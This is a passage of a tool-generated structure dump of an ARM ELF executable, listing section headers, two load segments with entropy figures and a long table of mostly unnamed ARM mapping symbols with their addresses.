.fini	PROGBITS	0x1c618	0x14618	0x14	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x1c62c	0x1462c	0x452c	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x29000	0x19000	0x4	0x0	0x3	WA	0	0	4
.ctors	PROGBITS	0x29004	0x19004	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x2900c	0x1900c	0x8	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x29014	0x19014	0x4	0x0	0x3	WA	0	0	4
.data	PROGBITS	0x29018	0x19018	0x328	0x0	0x3	WA	0	0	4
.bss	NOBITS	0x29340	0x19340	0x6768	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x19340	0xcd0	0x0	0x0		0	0	1
.debug_aranges	PROGBITS	0x0	0x1a010	0x120	0x0	0x0		0	0	8
.debug_info	PROGBITS	0x0	0x1a130	0x608	0x0	0x0		0	0	1
.debug_abbrev	PROGBITS	0x0	0x1a738	0xb4	0x0	0x0		0	0	1
.debug_line	PROGBITS	0x0	0x1a7ec	0x905	0x0	0x0		0	0	1
.debug_frame	PROGBITS	0x0	0x1b0f4	0xa0	0x0	0x0		0	0	4
.shstrtab	STRTAB	0x0	0x1b194	0xa8	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x1b55c	0x5040	0x10	0x0		19	702	4
.strtab	STRTAB	0x0	0x2059c	0x2a9c	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x18b58	0x18b58	6.1865	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0x19000	0x29000	0x29000	0x340	0x6aa8	3.8943	0x6	RW	0x8000	.eh_frame .ctors .dtors .jcr .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x8094	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x80b0	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x1c618	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x1c62c	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x29000	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x29004	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x2900c	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x29014	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x29018	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x29340	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	13
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	14
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	15
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	16
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	17
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	18
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	19
$a	.symtab	0x8094	0	NOTYPE	<unknown>	DEFAULT	1
$a	.symtab	0x1c618	0	NOTYPE	<unknown>	DEFAULT	3
$a	.symtab	0x80b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x8128	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1c624	0	NOTYPE	<unknown>	DEFAULT	3
$a	.symtab	0x8188	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x80a0	0	NOTYPE	<unknown>	DEFAULT	1
$a	.symtab	0x1c5dc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1c610	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x80a4	0	NOTYPE	<unknown>	DEFAULT	1
$a	.symtab	0x80a8	0	NOTYPE	<unknown>	DEFAULT	1
$a	.symtab	0x1c628	0	NOTYPE	<unknown>	DEFAULT	3
$a	.symtab	0x8190	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x81cc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x8630	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x8778	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x884c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x89b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x8ae8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x93c8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x9798	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x991c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x9a6c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xa02c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xa450	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xa4b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xb600	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xbd34	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xbe6c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xc588	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xcb70	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xdbc0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xe894	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xeb5c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf508	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf590	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf65c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0xf7e4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x102bc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x104ac	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x104f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1053c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x105b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x10640	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x107d0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x115b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x116c0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1178c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11870	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11874	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x118c0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x118f0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1191c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11924	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11980	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x119ac	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x119b4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x119bc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x119ec	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x119f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11a20	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11a28	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11a54	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11a84	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11ab0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11ad8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11b04	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11bcc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11bf8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11c48	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11c70	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11ca0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11ccc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11d00	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11d0c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11d3c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11d70	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11e24	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11ea0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11eb0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11f68	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x11f94	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x126c4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1275c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x12794	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x12930	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1297c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x12ebc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x12ef0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x12fa0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13040	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x130a0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x130b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x130d0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x130e0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x130f0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x131e8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x132c0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x132e4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1339c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13488	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1349c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x134a8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13590	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x135b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13628	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13690	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x136b4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x136bc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1370c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13738	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13764	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13794	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x137c0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x137f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13820	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13854	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13884	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x138b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x138e0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x138f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13998	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x13a04	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x142c0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x143cc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14734	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14b88	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14bb0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14cb0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14cb4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14d30	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14dbc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14e54	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14ed0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x14f98	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15024	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15104	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x151cc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x151d8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x151e0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15378	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1540c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x154b4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x155cc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x159a0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15b8c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15c20	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15c6c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15d10	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15d48	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x15d94	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16034	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16094	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x160b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16124	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1612c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16158	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16184	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1619c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x161a4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x161d0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x161fc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16204	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1625c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16264	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16290	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x162bc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x162ec	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x162f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16320	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x163f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x164b0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1654c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x165e0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x166b4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x166c0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16a48	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16a98	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16ab8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16b64	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16cd4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16ce0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x16d98	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x17084	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x171bc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x172c0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x17330	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x17370	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x174c4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x17c64	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x17d20	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x17dbc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x17efc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x180cc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x181fc	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18290	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18720	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18814	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18888	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x188c8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18978	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18a54	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18a9c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18ae0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18af8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18be0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18c20	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18d10	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18fa8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18fc0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x18fe4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1901c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1906c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x19720	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x19880	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1988c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x199c4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x19a20	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x19ae0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x19b0c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x19bc8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x19bf8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x19ec4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1a270	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1a364	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1aae4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1ab24	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1ab64	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1af70	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1afec	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b034	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b328	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b354	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b3c4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b414	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b480	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b490	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b4c0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b5a8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b65c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b6b8	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b6c4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b8a4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b8d0	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b94c	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1b9f4	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1bb34	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1bf34	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1c460	0	NOTYPE	<unknown>	DEFAULT	2
$a	.symtab	0x1c588	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x29004	0	NOTYPE	<unknown>	DEFAULT	6
$d	.symtab	0x2900c	0	NOTYPE	<unknown>	DEFAULT	7
$d	.symtab	0x8118	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x8174	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x29020	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x1c60c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x29024	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x81c0	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x29028	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x8774	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x8844	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x89ac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x8adc	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x93c4	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x9788	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x9918	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1d320	0	NOTYPE	<unknown>	DEFAULT	4
$d	.symtab	0x9a68	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xa028	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xa448	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xa4ac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xb5e4	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xbd30	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xbe68	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xc584	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xcb50	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xdb6c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xe874	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xeb48	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xf4d0	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xf580	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xf64c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0xf7e0	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x290dc	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x1044c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x104f0	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x10538	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x105ac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1063c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x107c8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x11cfc	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x290e0	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x290e8	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x11d08	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x11d38	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x11e9c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x11eac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x11f58	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x290f0	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x1fab8	0	NOTYPE	<unknown>	DEFAULT	4
$d	.symtab	0x126a8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1292c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x12970	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x12e8c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x2922c	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x132b8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x13480	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x134a4	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x13588	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x13624	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x13704	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x13994	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x142a0	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x29230	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x143b8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1471c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x14b68	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x14bac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x14ca0	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x29248	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x14d18	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x14da4	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x14e3c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x14eb8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x29260	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x14f94	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x15020	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x150f8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x151c8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x206e4	0	NOTYPE	<unknown>	DEFAULT	4
$d	.symtab	0x15374	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x153f0	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x2930c	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x154b0	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x155ac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x155dc	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x15b6c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x15c1c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x15c68	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x15d00	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x15d44	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x15d88	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x15ff8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x29324	0	NOTYPE	<unknown>	DEFAULT	9
$d	.symtab	0x1611c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x16198	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x16258	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x163e4	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x164ac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x16548	0	NOTYPE	<unknown>	DEFAULT	2
